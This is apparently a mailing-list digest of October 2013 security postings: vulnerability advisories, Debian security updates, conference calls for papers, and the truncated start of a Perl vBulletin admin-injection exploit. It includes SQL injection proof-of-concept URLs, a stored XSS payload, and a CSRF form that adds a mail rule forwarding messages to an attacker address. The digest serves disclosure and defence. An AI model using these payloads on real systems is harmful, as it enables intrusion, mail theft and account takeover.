Onpub CMS 1.4 1.5 - Multiple SQL Injection Vulnerabilities

2013-10-28 Thread Vulnerability Lab 
Document Title:
===
Onpub CMS 1.4  1.5 - Multiple SQL Injection Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1120


Release Date:
=
2013-10-26


Vulnerability Laboratory ID (VL-ID):

1120


Common Vulnerability Scoring System:

8.2


Product  Service Introduction:
===
Onpub is a web content management system (CMS) designed for those with 
intermediate to advanced web development skills 
looking to quickly set up custom, dynamic websites that are quick to update and 
easy to maintain. All Onpub content is 
stored in a fast and reliable MySQL database backend. There are many ways to 
customize and extend Onpub`s default 
design and functionality via open-standard web development tools and techniques.

Onpub is ideal for those with no desire to implement a CMS from scratch, but 
still need a custom, yet agile solution. 
Onpub tightly integrates many widely used third-party web apps and scripts in 
to one coherent system to build further upon.

( Copy of the Vendor Homepage: http://onpub.com/ )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple remote web 
vulnerabilities in the Onpub v1.5 Content Management System web-application.


Vulnerability Disclosure Timeline:
==
2013-10-26:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Onpub
Product: Onpub - Content Management System 1.4  Lite and 1.5


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details  Description:

1.1
Multiple remote sql injection web vulnerabilities are detected in the official 
in the Onpub v1.4 and 1.5 Content Management System web-application.
The vulnerability allows remote attackers to unauthorized inject own sql 
commands to compromise the web-application or the web-server dbms.

The sql injection vulnerabilities are located in the 
`websiteID`,`imageID`,`keywords`,`orderBy`,`order` and `articleID` values of 
the index.php file. 
Remote attackers are able to inject own sql commands via GET method request to 
compromise the database management system or cms web-application.
The inject can be done by usage of the manage path via GET method request or by 
usage of the articleID in the index.php file POST method request. 
The severity of the remote sql injection bugs is estimated as critical.

Exploitation of the remote sql injection web vulnerability requires no user 
interaction or privileged web-application user account.
Successful exploitation of the remote sql injection bug results in database 
management system and cms or web-application compromise.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] websiteID
[+] imageID
[+] keywords
[+] orderBy
[+] order
[+] articleID



2.1
A client-side post inject web vulnerability is detected in the official in the 
Onpub v1.4 and v1.5 Content Management System web-application.
The vulnerability allows remote attackers to manipulate via POST method 
web-application to browser requests (client-side).

The client-side cross site scripting web vulnerability is located in the 
vulnerable `page` parameter of the index.php file (manage module). 
Remote attackers can manipulate the `page` parameter in the `index.php` file 
via GET method request to compromise client-side application context.

Successful exploitation of the client-side cross site scripting web 
vulnerability results in session hijacking, client-side phishing, 
client-side unauthorized external redirects and client-side manipulation of the 
contact formular module context.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] page



Proof of Concept (PoC):
===
1.1
The sql injection web vulnerabilities can be exploited by remote attackers 
without privileged application user account and user interaction.
For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsitewebsiteID=-1%27[SQL-INJECTION
 VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticlesfullTextSearch=1keywords=-1%27[SQL-INJECTION
 VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsitesorderBy=-1%27[SQL-INJECTION

Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability

2013-10-28 Thread Vulnerability Lab 
Document Title:
===
Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability



Release Date:
=
2013-10-26


Vulnerability Laboratory ID (VL-ID):

1119


Common Vulnerability Scoring System:

3.8


Product  Service Introduction:
===
Feeder.co (www.feeder.co) is the simplest and prettiest way to follow your 
favorite feeds and sites. 
Feeder supports most RSS and Atom feeds on the web. Get a simple overview of 
your RSS and Atom feeds 
in the toolbar. A simple and pretty way of keeping track of your latest RSS and 
Atom feeds. 
The best RSS Feed Reader extension for Chrome. 

- Instantaneously see when new posts are added to one of your RSS and Atom feeds
- Easily subscribe to new RSS/Atom feeds by clicking the browser icon
- Intuitively manage your feeds
- Right click context-menus in popup-menu let you mark all as read, and other 
nifty shortcuts
- Export your feeds so you can import them on another computer and/or keep them 
as backups for safekeeping
- Customize your feeds by choosing how many posts to display, or changing the 
title
- Organize your feeds using folders and sorting with drag and drop
- Choose between three different themes: Dark, Mint or Light 
- Everything is contained within the browser so no other third-party sites are 
needed
- Notifications when feeds have been updated. Enable globally or on select feeds
- Supports both RSS and Atom feeds
- See when a page has any RSS or Atom feeds to subscribe to

(Copy of the Vendor Product Homepage: http://feeder.co )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a persistent web 
vulnerability in the Feeder.co RSS Feeds Chrome Addon.


Vulnerability Disclosure Timeline:
==
2013-10-26: Researcher Notification  Coordination (Ateeq Khan)


Discovery Status:
=
Published


Affected Product(s):

Feeder.co
Product: RSS Feeder - Chrome Browser Addon 5.2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details  Description:

A remote script code execution vulnerability has been detected in the official 
feeder.co RSS browser extension application.
The vulnerability allows remote attackers to manipulate via POST method 
web-application to browser requests (persistent).

The vulnerability affects the main feed input field and since the application 
is not performing input sanatization properly, 
it is possible to inject persistent script code within the affected folder name 
input field which then directly gets executed 
when the victim tries to delete the malicious entry. 

It is possible to inject malicious script code in the folder `Name` field 
parameter of the feeds while adding a new entry. 
The code execution happens when a user tries to delete the injected entries. 
the affected sourcecode with injected payload 
is given below for your reference:

div class=``pui-confirm-text``Delete ``iframe onload=``prompt(2)`` 
src=``http://evolution-sec.com``script?/iframe/div

It is also possible to inject malicious code through remote URL simply by 
adding new RSS feeds from a third party remote website. 
In this case, the ``Title`` parameter is vulnerable.

It is also possible to import/export the RSS feeds through a file which makes 
this attack vector remotely exploitable through 
this method as well.

This vulnerability affects all current feeder.co users who are using the RSS 
browser extension application for PC. iOS and 
Android users may also be affected with this vulnerability. 

Successful exploitation of the persistent cross site scripting web 
vulnerability results in persistent client-side phishing, 
persistent client-side unauthorized external redirects and persistent 
manipulation of the module context.


Vulnerable Module(s):
[+] RSS Feeds

Vulnerable Sections(s):
[+] Add Feed (Title parameter)
[+] Add Folder Name (Name parameter)


Proof of Concept (PoC):
===
The persistent script code execution vulnerability can be exploited by remote 
attackers without required web-application user account and 
with medium user interaction. For demonstration or to reproduce ...


To reproduce the proof of concept, the researcher used multiple ways including 
importing feeds from a remote URL and adding payloads manually.

Including payloads from remote URL:

1. Add a new feed entry in the browser extension with the following POC URL 
https://groups.google.com/forum/feed/evosec/msgs/rss.xml?num=15
2. You should now see the injected entries in your feeds. 
3. Try to delete the newly included entry feed 
4. You should see the code being

Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability

2013-10-28 Thread Vulnerability Lab 
Document Title:
===
Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1038

PayPal Security UID: gJ1127yy


Release Date:
=
2013-10-26


Vulnerability Laboratory ID (VL-ID):

1038


Common Vulnerability Scoring System:

4.3


Product  Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its 
corporate headquarters are in San Jose, California, United 
States at eBay s North First Street satellite office campus. The company also 
has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow 
(near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), 
China s bankcard association, to allow Chinese consumers 
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia 
to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of 
denial-of-service attacks organized by Anonymous in retaliation 
for PayPal s decision to freeze the account of WikiLeaks citing terms of use 
violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a persistent input 
validation vulnerability  in the official PayPal Inc (Core  API) Shipping 
Application.


Vulnerability Disclosure Timeline:
==
2013-07-31: Researcher Notification  Coordination (Benjamin Kunz Mejri)
2013-08-01: Vendor Notification (PayPal Site Security Team - Bug Bounty 
Program)
2013-09-26: Vendor Response/Feedback (PayPal Site Security Team - Bug 
Bounty Program)
2013-10-25: Vendor Fix/Patch (PayPal Site Developer Team)
2013-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PayPal Inc
Product: Shipping  MOS Application - API 2013 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details  Description:

A persistent input validation web vulnerability is detected in the official 
PayPal Inc (Core  API) Shipping Web Application.
The vulnerability allows remote attacker to inject own malicious script codes 
to the application-side with persistent attack vector. 

The vulnerability is located in the service unavailable exception of the Get 
Started with paypal module. Remote attackers can request 
the Get Started service with an

[SECURITY] [DSA 2785-1] chromium-browser security update

2013-10-28 Thread Michael Gilbert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2785-1   secur...@debian.org
http://www.debian.org/security/   Michael Gilbert
October 26, 2013   http://www.debian.org/security/faq
- -

Package: chromium-browser
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-2906 CVE-2013-2907 CVE-2013-2908 CVE-2013-2909 
 CVE-2013-2910 CVE-2013-2911 CVE-2013-2912 CVE-2013-2913
 CVE-2013-2915 CVE-2013-2916 CVE-2013-2917 CVE-2013-2918
 CVE-2013-2919 CVE-2013-2920 CVE-2013-2921 CVE-2013-2922
 CVE-2013-2923 CVE-2013-2924 CVE-2013-2925 CVE-2013-2926
 CVE-2013-2927 CVE-2013-2928

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2013-2906

Atte Kettunen of OUSPG discovered race conditions in Web Audio.

CVE-2013-2907

Boris Zbarsky discovered an out-of-bounds read in window.prototype.

CVE-2013-2908

Chamal de Silva discovered an address bar spoofing issue.

CVE-2013-2909

Atte Kuttenen of OUSPG discovered a use-after-free issue in
inline-block.

CVE-2013-2910

Byoungyoung Lee of the Georgia Tech Information Security Center
discovered a use-after-free issue in Web Audio.

CVE-2013-2911

Atte Kettunen of OUSPG discovered a use-after-free in Blink's XSLT
handling.

CVE-2013-2912

Chamal de Silva and 41.w4r10r(at)garage4hackers.com discovered a
use-after-free issue in the Pepper Plug-in API.

CVE-2013-2913

cloudfuzzer discovered a use-after-free issue in Blink's XML
document parsing.

CVE-2013-2915

Wander Groeneveld discovered an address bar spoofing issue.

CVE-2013-2916

Masato Kinugawa discovered an address bar spoofing issue.

CVE-2013-2917

Byoungyoung Lee and Tielei Wang discovered an out-of-bounds read
issue in Web Audio.

CVE-2013-2918

Byoungyoung Lee discoverd an out-of-bounds read in Blink's DOM
implementation.

CVE-2013-2919

Adam Haile of Concrete Data discovered a memory corruption issue
in the V8 javascript library.

CVE-2013-2920

Atte Kuttunen of OUSPG discovered an out-of-bounds read in URL
host resolving.

CVE-2013-2921

Byoungyoung Lee and Tielei Wang discovered a use-after-free issue
in resource loading.

CVE-2013-2922

Jon Butler discovered a use-after-free issue in Blink's HTML
template element implementation.

CVE-2013-2924

A use-after-free issue was discovered in the International
Components for Unicode (ICU) library. 

CVE-2013-2925

Atte Kettunen of OUSPG discover a use-after-free issue in Blink's
XML HTTP request implementation.

CVE-2013-2926

cloudfuzzer discovered a use-after-free issue in the list indenting
implementation.

CVE-2013-2927

cloudfuzzer discovered a use-after-free issue in the HTML form
submission implementation. 

CVE-2013-2923 and CVE-2013-2928

The chrome 30 development team found various issues from internal
fuzzing, audits, and other studies. 

For the stable distribution (wheezy), these problems have been fixed in
version 30.0.1599.101-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 30.0.1599.101-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)

iQQcBAEBCgAGBQJSWwMrAAoJELjWss0C1vRzix8f/3u/oOLmR1/70gZliS/mbGYh
MKCxR0BgS85CENIYujIlW1k+urYEnfjZkpDqzh41ExpgCos6NcncNtoP3apz2UDX
6g/qh/cbUC7eXUfXW/Z2/XFam9RtNoa9helhpuZ5RvyZ+A836CkEzCwigFOpgOMJ
e/sPjgxwSpz3nlYR3VPG6dRMSOx0jFeickNZTHPm3DmuhmF3dvnKWKlmTvJ1LtC9
/GFHmdGckoVEVNMHD5v8FAlCwoRNAZ/WK/7h4Ro9/mc8Z9qJYB/7dUveiIAO73Qj
JiOxI1hHjcCtsm3lUBmKe5/WDcTWeLz5IRTLfOMrxp0zZfYp858y2/tDDnqeNFn2
EVaKMsOZytVpF4ercGoszruDiKdnX8Uq6Ng44SssQf37FNDUOo9nrBghLyWnl8Kz
07MxAHzz4N8uy2UyjVTmzIYSP0s9ccRH6KgPxTfbWBdyb8Q/inKEU/7/XbBHKZSm
Cqfh5jqIMcIuupg8wT20up4FvtcWSHrw2JmZxEQEsBn/wbNF+b67VNniUDFWgua7
LUmCmhJeZv+Zhjc4cHVliI5cGP03m4C/25dUplR9rofZ8VEG0vkPj6J3nyaEnCiS
NY6Z3AfmntvRS50Vbrl+6v0BLjSjXeWPt2nRneQ+bEaCM8PX7wIPYBCczVxzzZrH
6nw7ngqrOCmwiuz0+2O777wmanWCAFimpaVwGNBqNxdfcywk16unIA+YU2AbHLeq
anevGnQBbjyi9joO9gN67CCIBBVqmZ93DQHIUyjPNpuixtz9gzkunVdt9r+8OM3l
Nom/ttW6foZ9NlLbg5tbYHtTrpZ/t8ng6it4AHmGM/QqGQmXZdYanNZ03ok3IFE7
lJNKGZb/TgwQms3dd3hXheOx8D3p8MclSyo81iaF5KAhsZ6bRVHM/u8hKtFZ8FIL
nF3ppA0Y/HUZS1W9UweOJT0Vlxt8PNHn8YTHEhYUXX/HX5uDIdVVS4XSWCTxVYlu

[SECURITY] [DSA 2787-1] roundcube security update

2013-10-28 Thread Salvatore Bonaccorso 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2787-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
October 27, 2013   http://www.debian.org/security/faq
- -

Package: roundcube
Vulnerability  : design error
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-6172
Debian Bug : 727668

It was discovered that roundcube, a skinnable AJAX based webmail
solution for IMAP servers, does not properly sanitize the _session
parameter in steps/utils/save_pref.inc during saving preferences. The
vulnerability can be exploited to overwrite configuration settings and
subsequently allowing random file access, manipulated SQL queries and
even code execution.

roundcube in the oldstable distribution (squeeze) is not affected by
this problem.

For the stable distribution (wheezy), this problem has been fixed in
version 0.7.2-9+deb7u1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your roundcube packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBCgAGBQJSbNQmAAoJEAVMuPMTQ89E6zYP/0tlZhlEgadu7xvTauny/zim
RV2WCJFLmRMCGZYhCiOJ2ND50fAnn62CdO+vnWN3JH5FH0KIngLmtGfrq+EPjLwj
rFPGMPKRDZRag8oV3SeKbsHlrcMHS5H/B9GhILst3+32pbwoBE7aH5+wTMYHshsF
TK0whlv73RZge6njPfzqvdkSoIgCLYx4Mc+pXP/pC+wOaSiD/gMjKBh51DoOwpnB
r7rfs7wmy4Ke1Ljsw35LceX64kCP8YC9d7FUPZc8SxUKEk3eojrhnSzpDUBt+Pvl
/S8nAbCbbrosh464szwXL4w6gcZIDDJgvy3u3aTn+XvRCoK6cr8RrdMbBQibR1Xb
9hCdieOs0pkNbBI4yE6bivztAolHlfAwvsgFPcMv3fM26gAsSOC8SRrzRqQrqqqk
1jfUqJETE+W0FkjmZa4W6JiDm78ZP4DNFQCrITRaealMgo2dh2uKua/4PmaBwjJ/
/lrukur5D6mCcLxFEpRA9TwDYVcvWE3cCVL9WhaMBNRJWiuKuaamOujO7jPtzga8
uJZWGKQNTd4rB6WHN4uN2wqltPH3lOIxvOd+2Uu9P9mDwQkgfrQ0s/hwjB3dpPWO
vNqHSeK2j8RZPDD4reulRFC4vEbI3MCXOUcyc+JqgI9Pa61Y0qrM6PwWyoPTDROr
PGySE+o+FGBjlugiGG51
=CNJm
-END PGP SIGNATURE-

Call for Papers, 2014 Symposium on Cryptography and Authentication (SCA2014) , Suzhou, China

2013-10-28 Thread 2014 Symposium on Cryptography and Authentication (SCA2014) 
This message was sent to [bugtraq@securityfocus.com]. Unsubscribe If you cannot read it, please click  here.
 
 
   

 
 
   

 
 Call for Papers  
 
 
 2014 Symposium on Cryptography and Authentication (SCA2014)  
 
 
  Submission Due: Nov. 27, 2013  Conference: March 10-12, 2014 
 

   
 
 
 
   

 
 Dear Colleagues,  
 
 
  We would like to cordially invite you to submit or recommend papers to 2014 Symposium on Cryptography and Authentication (SCA2014)! This conference will be held from March 10 to 12, 2014 in Suzhou, China. The conference will bring together leading researchers, engineers and scientists in the domain of interest from around the world. More detailed information can be found at www.engii.org/workshop/CIS2014March.  
 

   
 
 
 
   

 
 Related Topics (more can be found in our website)  
 
 
  • Anti-Virus and Anti-Worms 
  • Key Management and Key Recovery 
 
 
  • Database Security 
  • Language-based Security 
 
 
  • Distributed Systems Security 
  • Security Evaluation 
 
 
  • Electronic Commerce Security 
  • Security for Mobile Computing 
 
 
  • Fraud Control 
  • Security Models 
 
 
  • Information Security Engineering 
  • System Security 
 
 
  • Information Privacy 
  • Signature and Key Agreement Protocol 
 

   
 
 
 
   

 
 Technical Program Committee  
 
 
  Prof. Fagen Li, University of Electronic Science and Technology of China Prof. Xiaochun Cheng, Middlesex University Prof. Vic Grout, Glyndwr University Prof. Giannis F. Marias, Athens University of Economics and Business Prof. Stavros D. Nikolopoulos, University of Ioannina  More  
 

   
 
 
 
   

 
 Publication and Presentation 
 
 
  All the accepted papers will be published by Journal of Computer and Communications (ISSN:2327-5219), a peer-reviewed open access journal that can ensure the widest dissemination of your published work. If you want to present your research results but do NOT wish to publish a paper, you may simply submit an Abstract to our Registration System.  
 

   
 
 
 
   

 
 Yours sincerely, 
 
 
  SCA Organizing Committee Email: c...@engii.org Tel : +86- 132 6470 2230

[CVE-2012-6297] DD-WRT v24-sp2 Command Injection

2013-10-28 Thread Craig Young 
Unfortunately command injections like the NETGEAR one Zachary Cutlip
and I both came across are all too common in embedded systems.

Similar to NETGEAR and Linksys having commands injected when running
ping, I have also noticed that DD-WRT v24-sp2 is prone to command
injection from specially crafted configuration values containing shell
meta-characters.  A remote attacker can potentially use CSRF from an
authenticated client to remotely execute commands on the router as the
root user.  This is also an easy way to DoS a system since you could
potentially force it into a reboot loop.

I reported this in the projects bug tracker almost a year ago but it
doesn't look like this is actively maintained so I figured I may as
well share with the list now in case anyone is running this firmware.
This is tracked as CVE-2012-6297.

There are a lot of consumer routers with these types of issues
(working with several vendors on this stuff at the moment) so I have
provided this list of generic tips for keeping consumer/SOHO routers
secure: 
http://www.tripwire.com/state-of-security/vulnerability-management/five-tips-securing-soho-routers/

I would also love to hear what other suggestions people have towards
minimizing the risk of someone popping a shell on your router.

Regards,
Craig
http://secur3.us/pub_key.asc

Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)

2013-10-28 Thread 2014 Symposium on Protocols and Rules for Security (SPRS2014) 
This message was sent to [bugtraq@securityfocus.com]. Unsubscribe If you cannot read it, please click  here.
 
 
   

 
 
   

 
  
 2014 Symposium on Protocols and Rules for Security (SPRS2014) Call for Papers 
 
 
  
 

   
   

 
 Dear Colleagues, We would like to cordially invite you to submit or recommend papers to 2014 Symposium on Protocols and Rules for Security (SPRS2014)! This conference will be held from March 10 to 12, 2014 in Suzhou, China. The conference will bring together leading researchers, engineers and scientists in the domain of interest from around the world. More detailed information can be found at www.engii.org/workshop/CIS2014March.  
 

   
   

 
 
   

 
 Topics   • Access Control • Anti-Virus and Anti-Worms • Authentication and Authorization • Biometric Security • Cryptography • Data and System Integrity • Database Security • Distributed Systems Security • Electronic Commerce Security • Intrusion Detection • Key Management and Key Recovery • Language-based Security • Network Security • Operating System Security • Risk Evaluation and Security Certification • Security Evaluation • Security for Mobile Computing  
 
 
 
   
 
 
 Important Dates  Submission Due: Nov. 27, 2013 Conference: March 10-12, 2014  
 

   
 
   

 
   Technical Program Committee   Prof. Fagen Li, University of Electronic Science and Technology of China Prof. Xiaochun Cheng, Middlesex University Prof. Vic Grout, Glyndwr University Prof. Giannis F. Marias, Athens University of Economics and Business Prof. Stavros D. Nikolopoulos, University of Ioannina  More  Publication and PresentationAll the accepted papers will be published by Journal of Computer and Communications (ISSN:2327-5219), a peer-reviewed open access journal that can ensure the widest dissemination of your published work.  To be considered for an oral presentation, you can also submit your abstract to our submission system.  
 

   
 

   
   

 
  Contact Us  Email: c...@engii.org  Tel : +86- 132 6470 2230

[SECURITY] [DSA 2786-1] icu security update

2013-10-28 Thread Michael Gilbert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2786-1   secur...@debian.org
http://www.debian.org/security/   Michael Gilbert
October 27, 2013   http://www.debian.org/security/faq
- -

Package: icu
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-0900 CVE-2013-2924
Debian Bug : 702346 726477

The Google Chrome Security Team discovered two issues (a race condition
and a use-after-free issue) in the International Components for Unicode
(ICU) library.

For the oldstable distribution (squeeze), these problems have been fixed
in version 4.4.1-8+squeeze2.

For the stable distribution (wheezy), which is only affected by
CVE-2013-2924, this problem has been fixed in version 4.8.1.1-12+deb7u1.

For the testing distribution (jessie), which is only affected by
CVE-2013-2924, this problem will be fixed soon.

For the unstable distribution (sid), which is only affected by
CVE-2013-2924, this problem has been fixed in version 4.8.1.1-13+nmu1.

We recommend that you upgrade your icu packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)

iQQcBAEBCgAGBQJSbYO5AAoJELjWss0C1vRzCO0f/2f0LJGu/BNl9fTFUAcG75j+
MmY927JqeOgQxbglH5CK/Rj8m+FCKE9D9Ak8ac4odA3R6AlIja4sQWHuiXJFTxP8
ZEJSmfrSS/dcolts3rBRxQOomQcIy6HrcXllmSn5q6GHjOkyykjRXGkVlfpcU98X
hBrCu4dzgzgIglUC61Esmfd3qiw7R7ZVik+obKniRTgDkxX+piAaTsQpGGKoRoA2
NDwbHil2iIcpQ7o/HYrhxTPLDzgrN0/wsSJpCEYVlIp+WwSk3ZZOqB8/P+lL7lpx
xDhq9HVxyicQsisrNZMSU7lq5GEtHzN5krVEfCCmbjLsosuJWwu7vgS2Dbpm91Z+
AtpTjBSwj1r85+lKy5vsYbETrX6N9EAWV8Pav+NbBzLGCofWdVlFw3aQM49I7geq
ADuV00toYV/XLeEWd/Foz5FuxHU9TKX/gkMkNkqpGCcXQ58PMnKOJMRV6SEB8Sem
sipq9CIbxi60dKQCgn+TkvRfULHNAhlzR4V0MG8Xr4ev26pvWQgoWDAA/kVg6AUr
64Cb+t5mHWllj93/+C34sAnRosNUJBRBTwuW4azL5fczh1YW4FiJ8SZPh8mOG+iA
VoYrQhv/+tUdb5cYtog4QXMLLV0Ai6SM5OioGdZSLSLaMw2Y4mdD3S4WiPZmOZEY
ITihdQzTX1VlqO8nYpE/zTcb9z4CIaFyoENLUe0G6F6aNGYcRsS0ZdX+IFY/KsBC
s2eHaVnF1Vv2CWmi9ml9svunnf4szCbJ8VBsoMhahsfTntuo6pbeVj66I3CUGYuY
Buc6Eoygzsl4MeD0fmYOMEAmMLvcA0Ehp/PJxyXFd/dJoV46cNuWz7HaqNH/5qa6
hDjhUb1SnmuFbh7FuLhr6EhujJiSy9SNVfMGojnThpH2sEFa66PAW+gXi3BkfwV7
jFU52Mc0fIL+ZHsvkWEXuz7Ha5NfCYmG50p9esyKMlAPXJ7EVwfBy02Dqzvyyy1n
g+wAtLtvo7oicjTDsuJ7sGuQGzJaME0zt26Q0OVHA+lJnh/KzcWO2LFoYk/Fpv3N
sjGwi/ge7hJiqcXvzbYGRgTlb6E0z/1e85DePrkha/a8zUCdJFDm8SqRfssqvdE5
QKnM63XvoDdIjO958yQa614D1UQ4f4ey0/iKdXa/NwbackMgPKBCllzkU/B5tVc/
LDeIGK5d355nWCBLt2AZ+V7N+taaKHdjmtpPStdT65QRKuXt2xIIJzJ4jWBc+p0F
Vnh9lqBJDmHd6R3zTQKas25rCQyoB1Lfv74ANouAK1prgfdeEzVawmE+W1h6l6P1
OVAj7tjOrNq0xEli+B2iFMJG/6Q7VC8siCBQdHZYqWfMS21QIQj11PEcQHP7HFA=
=WhFc
-END PGP SIGNATURE-

Multiple CSRF Horde Groupware Web mail Edition 5.1.2

2013-10-28 Thread m . benetrix 
#
Exploit Title : Multiple CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/25/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based 
communication suite. Users can read, send and organize email messages and 
manage and share calendars, contacts, tasks, notes, files, and bookmarks with 
the standards compliant components from the Horde Project

##
CSRF Location

Several functionalities from Rules section were found to miss the token so as 
to prevent CSRF


##
POC

A body
form action=./horde/ingo/basic.php?page=rule method=POST
  input type=hidden name=actionID value=rule#95;save /
  input type=hidden name=conditionnumber value=#45;1 /
  input type=hidden name=name value=TestingCSRF /
  input type=hidden name=combine value=1 /
  input type=hidden name=field#91;0#93; value=From /
  input type=hidden name=match#91;0#93; value=contains /
  input type=hidden name=value#91;0#93;
value=test@hotmail#46;com /
  input type=hidden name=field#91;1#93; value= /
  input type=hidden name=action value=4 /
  input type=hidden name=actionvalue
value=attacker#64;hotmail#46;com /
  input type=hidden name=stop value=1 /
  input type=submit value=Submit request /
/form
  /body
/html

These were found at:
  * Creating a rule
  * Updating
  * Enabling

(http://www.test.com/horde/ingo/basic.php?page=filtersrulenumber=2actionID=rule_enable)
  * Deleting ( url-based 
https://www.test.com/horde/ingo/basic.php?page=filtersrulenumber=6actionID=rule_delete)

###
CVE identifier

CVE-2013-6275.
##
Vendor Notification
10/25/2013 to: the developers. They replied immediately and fixed the problem 
launching a patch:  http://bugs.horde.org/ticket/12796
10/28/2013: Disclosure

vBulletin remote admin injection exploit

2013-10-28 Thread simo 
#!/usr/bin/perl
#
# Title: vBulletin remote admin injection exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 17 September 2013
# Published: 24 October 2013
# MorXploit Research
# http://www.MorXploit.com
# 
# Vendor: vBulletin (www.vbulletin.com)
# Version: 4.1.x / 5.x.x
# Vulnerability: Remote admin injection
# Severity: High
# Status: Confirmed
#
# Exploit code description:
# Perl code to inject a new admin account through upgrade.php script.
#
# Vulnerability details:
# upgrade.php is vulnerable to a new admin account injection, the script 
doesn't require autentication when upgrading
# it only requires the customer number which can be extracted through the same 
script source code.
#
# Fix:
# Rename or delete the install folder until a fix is released.
#
# Author disclaimer:
# The information contained in this entire document is for educational, 
demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# Exploit usage:
#
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
# 
# ===
# --- vbulletin admin injection exploit
# --- By: Simo Ben youssef simo_at_morxploit_com
# --- MorXploit Research www.MorXploit.com
# ===
# [*] Trying to get customer number ... hold on!
# [+] Got !
# [*] Trying to MorXploit localhost ... hold on!
# [+] Admin account successfully injected!
# [+] Admin: MorXploit
# [+] Pass: m0rxpl017

use strict;
use IO::Socket;

if(!defined($ARGV[0])) {

system ('clear');
print \n;
print ===\n;
print --- vbulletin admin injection exploit\n;
print --- By: Simo Ben youssef simo_at_morxploit_com\n;
print --- MorXploit Research www.MorXploit.com\n;
print ===\n;

